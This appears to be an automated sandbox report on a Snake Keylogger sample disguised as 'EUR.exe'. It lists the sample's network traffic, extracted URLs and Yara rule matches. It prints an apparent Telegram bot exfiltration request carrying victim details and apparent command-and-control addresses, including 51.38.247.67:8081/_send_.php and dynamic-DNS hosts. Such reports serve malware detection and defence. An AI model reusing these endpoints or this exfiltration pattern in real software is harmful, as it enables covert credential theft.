Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: quicklyserv.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 30 Sep 2024 13:03:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 30 Sep 2024 13:03:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000319E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000338F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://quicklyserv.com
Source: 3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1802993888.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003279000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004292000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
